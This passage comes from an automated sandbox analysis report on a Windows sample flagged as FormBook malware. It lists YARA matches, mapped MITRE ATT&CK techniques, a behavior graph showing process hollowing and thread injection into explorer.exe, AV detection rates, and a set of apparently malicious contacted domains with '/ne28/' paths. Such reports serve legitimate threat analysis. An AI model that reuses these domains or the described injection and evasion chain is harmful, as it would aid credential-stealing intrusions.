          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 11.2.ClbrTLBbVA.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.2.ClbrTLBbVA.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.ClbrTLBbVA.exe.37f3360.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000D.00000002.528383336.0000000000740000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.528812589.0000000000970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.526498466.0000000000170000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.310875982.00000000036F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 11.2.ClbrTLBbVA.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.2.ClbrTLBbVA.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.ClbrTLBbVA.exe.37f3360.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000D.00000002.528383336.0000000000740000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.528812589.0000000000970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.526498466.0000000000170000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.310875982.00000000036F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Shared Modules          		Path Interception612
          Process Injection          		1
          Rootkit          		1
          Credential API Hooking          		221
          Security Software Discovery          		Remote Services1
          Credential API Hooking          		Exfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Masquerading          		1
          Input Capture          		2
          Process Discovery          		Remote Desktop Protocol1
          Input Capture          		Exfiltration Over Bluetooth1
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
          Disable or Modify Tools          		Security Account Manager31
          Virtualization/Sandbox Evasion          		SMB/Windows Admin Shares1
          Archive Collected Data          		Automated Exfiltration2
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)31
          Virtualization/Sandbox Evasion          		NTDS1
          Application Window Discovery          		Distributed Component Object ModelInput CaptureScheduled Transfer12
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script612
          Process Injection          		LSA Secrets1
          Remote System Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          Deobfuscate/Decode Files or Information          		Cached Domain Credentials112
          System Information Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items4
          Obfuscated Files or Information          		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job2
          Software Packing          		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 838418 Sample: ClbrTLBbVA.exe Startdate: 30/03/2023 Architecture: WINDOWS Score: 100 33 www.dafabetvn.info 2->33 35 dafabetvn.info 2->35 41 Snort IDS alert for network traffic 2->41 43 Malicious sample detected (through community Yara rule) 2->43 45 Multi AV Scanner detection for submitted file 2->45 47 6 other signatures 2->47 11 ClbrTLBbVA.exe 3 2->11         started        signatures3 process4 file5 31 C:\Users\user\AppData\...\ClbrTLBbVA.exe.log, ASCII 11->31 dropped 57 Tries to detect virtualization through RDTSC time measurements 11->57 59 Injects a PE file into a foreign processes 11->59 15 ClbrTLBbVA.exe 11->15         started        18 ClbrTLBbVA.exe 11->18         started        signatures6 process7 signatures8 61 Modifies the context of a thread in another process (thread injection) 15->61 63 Maps a DLL or memory area into another process 15->63 65 Sample uses process hollowing technique 15->65 67 Queues an APC in another process (thread injection) 15->67 20 explorer.exe 1 15->20 injected process9 dnsIp10 37 adornmentwithadrienne.com 66.235.200.145, 49698, 80 CLOUDFLARENETUS United States 20->37 39 www.adornmentwithadrienne.com 20->39 49 System process connects to network (likely due to code injection or exploit) 20->49 24 colorcpl.exe 20->24         started        signatures11 process12 signatures13 51 Modifies the context of a thread in another process (thread injection) 24->51 53 Maps a DLL or memory area into another process 24->53 55 Tries to detect virtualization through RDTSC time measurements 24->55 27 cmd.exe 1 24->27         started        process14 process15 29 conhost.exe 27->29         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          ClbrTLBbVA.exe32%ReversingLabsWin32.Trojan.Olock
          ClbrTLBbVA.exe48%VirustotalBrowse
          ClbrTLBbVA.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          11.2.ClbrTLBbVA.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          adornmentwithadrienne.com1%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.groupetalentapro.comReferer:0%Avira URL Cloudsafe
          http://www.6pg.shopReferer:0%Avira URL Cloudsafe
          http://www.11600yy.com/ne28/www.greengrovetherapy.com0%Avira URL Cloudsafe
          http://www.dafabetvn.infoReferer:0%Avira URL Cloudsafe
          http://www.fren.petReferer:0%Avira URL Cloudsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.forum-sanmonika.onlineReferer:0%Avira URL Cloudsafe
          http://www.fren.pet0%Avira URL Cloudsafe
          http://www.labishu.com/ne28/www.geseconevent.com0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.geseconevent.com/ne28/www.forum-sanmonika.online0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.labishu.com0%Avira URL Cloudsafe
          http://www.greengrovetherapy.com/ne28/www.listestubenring.com0%Avira URL Cloudsafe
          http://www.6pg.shop/ne28/www.labishu.com0%Avira URL Cloudsafe
          http://www.forum-sanmonika.online/ne28/0%Avira URL Cloudsafe
          http://www.fren.pet/ne28/www.groupetalentapro.com0%Avira URL Cloudsafe
          http://www.6pg.shop0%Avira URL Cloudsafe
          http://www.groupetalentapro.com/ne28/0%Avira URL Cloudsafe
          http://tempuri.org/RentalPropertyDataSet.xsd0%Avira URL Cloudsafe
          http://www.conviord.com0%Avira URL Cloudsafe
          http://www.groupetalentapro.com0%Avira URL Cloudsafe
          http://www.conviord.com/ne28/0%Avira URL Cloudsafe
          http://www.listestubenring.com/ne28/0%Avira URL Cloudsafe
          http://www.geseconevent.comReferer:0%Avira URL Cloudsafe
          http://www.hatchandneststudio.com/ne28/0%Avira URL Cloudsafe
          http://www.theredorchard.co.uk/ne28/0%Avira URL Cloudsafe
          http://www.zijlont.xyz/ne28/0%Avira URL Cloudsafe
          http://www.theredorchard.co.ukReferer:0%Avira URL Cloudsafe
          http://www.listestubenring.com/ne28/www.conviord.com0%Avira URL Cloudsafe
          http://www.poshcompanyandsuites.net0%Avira URL Cloudsafe
          http://www.dafabetvn.info/ne28/www.6pg.shop0%Avira URL Cloudsafe
          http://www.zijlont.xyzReferer:0%Avira URL Cloudsafe
          http://www.adornmentwithadrienne.com/ne28/www.dafabetvn.info0%Avira URL Cloudsafe
          http://www.greengrovetherapy.comReferer:0%Avira URL Cloudsafe
          http://www.hatchandneststudio.com/ne28/www.theredorchard.co.uk0%Avira URL Cloudsafe
          http://www.theredorchard.co.uk0%Avira URL Cloudsafe
          http://www.hatchandneststudio.comReferer:0%Avira URL Cloudsafe
          http://www.labishu.com/ne28/0%Avira URL Cloudsafe
          http://www.hatchandneststudio.com0%Avira URL Cloudsafe
